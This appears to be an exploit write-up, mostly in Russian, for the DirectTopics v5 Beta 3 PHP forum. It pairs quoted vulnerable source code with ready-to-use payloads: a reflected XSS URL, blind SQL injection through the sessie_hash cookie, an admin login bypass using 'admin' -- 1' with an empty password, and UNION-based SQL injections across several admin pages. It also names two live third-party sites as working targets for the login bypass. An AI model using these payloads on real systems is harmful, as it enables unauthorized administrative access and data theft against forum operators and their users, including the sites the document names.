DirectTopics v5 Beta 3 http://www.directtopics.nl/ pxss http://localhost/DT5/[email protected]&type=topic&forum=111&status=alle&sorteren=1>'><script>alert(121212)</script>&sorttype=ASC&submit=Zoeken ------------------------- includes/config.inc.php PHP: if( !isset($_COOKIE['user_id']) || empty($_COOKIE['user_id']) || !is_numeric($_COOKIE['user_id']) || empty($_COOKIE['sessie_hash']) ){ //Geen bestaande cookies, user niet ingelogd $_SESSION['ingelogd'] = 0; $_SESSION['user_id'] = 0; $_SESSION['tijd_ingelogd'] = 0; $_SESSION['last_active'] = 0; } elseif( !empty($_COOKIE['user_id']) && !empty($_COOKIE['sessie_hash']) ){ //Cookies bestaan, controlleren op waarde $Sessies_Query = $Sql->Query("SELECT l.*, s.*, g.* FROM dt5_leden l, dt5_sessions s, dt5_groepen g WHERE s.userid = '".$_COOKIE['user_id']."' && s.hash = '".$_COOKIE['sessie_hash']."' && l.led_id = s.userid && g.groep_id = l.led_groep"); $Sessie = mysql_fetch_array($Sessies_Query); Blind SQL http://localhost/DT5/index.php cookies PHPSESSID=be3a9c4bec43b23eabd98ead717cb00e; sessie_hash=' UNION SELECT 1,(select+*+from(select+*+from(select+name_const((version()),1)d)+as+t+join+(select+name_const((version()),1)e)b)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 -- 1; user_id=2 ------------------------- inloggen.php PHP: if( isset($_POST['submit']) ){ $User_Check_Query = $Sql->Query("SELECT led_id, led_nickname, led_wachtwoord, led_active FROM dt5_leden WHERE led_nickname = '".$_POST['login_nickname']."' && led_wachtwoord = '".md5($_POST['login_wachtwoord'])."'"); $User = mysql_fetch_array($User_Check_Query); if( $Sql->Count($User_Check_Query) == 0){ $Tpl->newBlock('TOON_MELDING'); $Tpl->Assign('MELDING', 'De ingevoerde combinatie is niet juist.'); } else { $Ban_Query = $Sql->Query("SELECT ban_gebnaam FROM dt5_ban WHERE ban_gebnaam = '".$_POST['login_nickname']."'"); if( $Sql->Count($Ban_Query) > 0){ $Tpl->newBlock('TOON_MELDING'); $Tpl->Assign('MELDING', 'Deze gebruikersnaam is verbannen van het forum. Het is dus niet mogelijk in te loggen met deze gebruikersnaam.'); } else { $User_nickname = $Txt->safeoutput($User['led_nickname']); $Login_Hash = md5( $User['led_id'].$User_nickname.time() ); $Sessie_naam = addslashes($_POST['sessie_naam']); setcookie('user_id', $User['led_id'], time()+3600*24*31, '/'); setcookie('sessie_hash', $Login_Hash, time()+3600*24*31, '/'); $_SESSION['ingelogd'] = 1; $_SESSION['user_id'] = $User['led_id']; $_SESSION['nickname'] = $User_nickname; $Sql->Query("INSERT INTO dt5_sessions (sessie_id, ingelogd, hash, userid, user_ip, tijd_ingelogd, tijd_lastactive, sessie_naam) VALUES ('".session_id()."', 'ja', '".$Login_Hash."', '".$User['led_id']."', '".$_SERVER['REMOTE_ADDR']."', '".time()."', '".time()."', '".$Sessie_naam."')"); if( $User['led_active'] == 'nee' ){ $Sql->Query("UPDATE dt5_leden SET led_active = 'ja' WHERE led_id = '".$User['led_id']."'"); } $Tpl->newBlock('TOON_MELDING'); $Tpl->Assign('MELDING', 'Je bent succesvol ingelogd als '.$User_nickname.'. Je wordt nu teruggestuurd naar de index.'); header('Refresh: 3; url= '.$Global_install_url.'index'.$Global_extension); Blind SQL mq=off http://localhost/DT5/user.php/inloggen post login_nickname=admin' -- 1 Заходим админом По адресу http://localhost/DT5/leden.php можно узнать логин администратора Логинимся http://localhost/DT5/user.php/inloggen в поле "Gebruikersnaam:" вводим имя админа и экранируем окончание SQL запроса Gebruikersnaam:admin' -- 1 Wachtwoord:пусто Locatie (Sessie naam) :пусто Пример http://www.onkrooid.be/forum/user.php/inloggen post login_nickname=Jonah' -- 1 http://examen2009.media2you.nl/user.php/inloggen Gebruikersnaam:Administrator' -- 1 ------------------------- admin/categorieen.php PHP: } elseif ( $_GET['a'] == 'wijzigen' ){ if( isset($_POST['submit']) ){ ... } else { $Categorie_Query = $Sql->Query("SELECT * FROM dt5_categorie WHERE cat_id = '".$_GET['id']."'"); SQL mq=off доступ в админку http://localhost/DT5/admin/index.php?a=wijzigen&s=subforum&p=categorieen&id=-1'+union+select+1,version(),3+--+ ------------------------- admin/editprofiel.php PHP: if( empty($_GET['id']) ){ if( isset($_POST['submit_zoek']) ){ if( empty($_POST['gebnaam']) && empty($_POST['userid']) ){ $Tpl->newBlock('TOON_MELDING'); $Tpl->Assign('MELDING', 'Je moet wel een Gebruikersnaam of GebruikersID invullen. Klik <a href="javascript:history.go(-1)">hier</a> om terug te gaan.'); } else { $User_Check_Query = "SELECT led_id FROM dt5_leden WHERE "; if( empty($_POST['gebnaam']) && !empty($_POST['userid']) ){ $User_Check_Query .= "led_id = '".addslashes($_POST['userid'])."'"; } elseif( !empty($_POST['gebnaam']) && empty($_POST['userid']) ){ $User_Check_Query .= "led_nickname = '".addslashes($_POST['gebnaam'])."'"; } elseif( !empty($_POST['gebnaam']) && !empty($_POST['userid']) ){ $User_Check_Query .= "led_nickname = '".addslashes($_POST['gebnaam'])."' && led_id = '".addslashes($_POST['userid'])."'"; } ... } else { $User_Query = $Sql->Query("SELECT * FROM dt5_leden WHERE led_id = '".$_GET['id']."'"); $User = mysql_fetch_array($User_Query); SQL mq=off доступ в админку http://localhost/DT5/admin/index.php?s=leden&p=editprofiel&id=-1'+union+select+1,user(),3,4,database(),6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+ ------------------------- admin/faqs.php PHP: } elseif ( $_GET['a'] == 'wijzigen' ){ if( isset($_POST['submit']) ){ if( empty($_POST['faq_titel']) || empty($_POST['faq_naam']) || empty($_POST['faq_bericht']) || empty($_POST['faq_inleiding']) ){ $Tpl->newBlock('TOON_MELDING'); $Tpl->Assign('TITEL', 'Fout!'); $Tpl->Assign('MELDING', 'Je moet wel de volgende velden invullen:<br>- FAQ Titel<br>- FAQ Naam<br>- FAQ Bericht<br>- FAQ Inleiding<p>Klik <a href="javascript:history.go(-1)">hier</a> om terug te gaan.</p>'); } else { $Faq_titel = addslashes($_POST['faq_titel']); $Faq_naam = addslashes($_POST['faq_naam']); $Faq_inleiding = addslashes($_POST['faq_inleiding']); $Faq_bericht = addslashes($_POST['faq_bericht']); $Faq_groepen = addslashes($_POST['faq_groepen']); $Sql->Query("UPDATE dt5_faqs SET faq_titel = '".$Faq_titel."', faq_naam = '".$Faq_naam."', faq_inleiding = '".$Faq_inleiding."', faq_bericht = '".$Faq_bericht."', faq_groepen = '".$Faq_groepen."' WHERE faq_id = '".$_GET['id']."'"); $Tpl->newBlock('TOON_MELDING'); $Tpl->Assign('TITEL', 'FAQ Gewijzigd'); $Tpl->Assign('MELDING', 'De FAQ is gewijzigd. Je kunt hem vinden door <a href="'.$Global_install_url.'faq'.$Global_extension.'/'.$Faq_naam.'" target="_blank">hier</a> te klikken.'); } } else { $Faq_Query = $Sql->Query("SELECT * FROM dt5_faqs WHERE faq_id = '".$_GET['id']."'"); $Faq = mysql_fetch_array($Faq_Query); SQL mq=off доступ в админку http://localhost/DT5/admin/index.php?s=beheer&p=faqs&a=wijzigen&id=-1'+union+select+1,version(),user(),database(),5,6+--+ ------------------------- аналогично SQL mq=off доступ в админку http://localhost/DT5/admin/index.php?s=leden&p=groepen&a=wijzigen&id=-1э+union+select+1,version(),3,user(),5,6,7,8+--+ http://localhost/DT5/admin/index.php?s=leden&p=notities&a=wijzigen&id=-2'+union+select+1,2,3,4,version(),6,user()+--+ http://localhost/DT5/admin/index.php?s=subforum&p=subforums&a=wijzigen&id=-1'+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13+--+ -------------------------
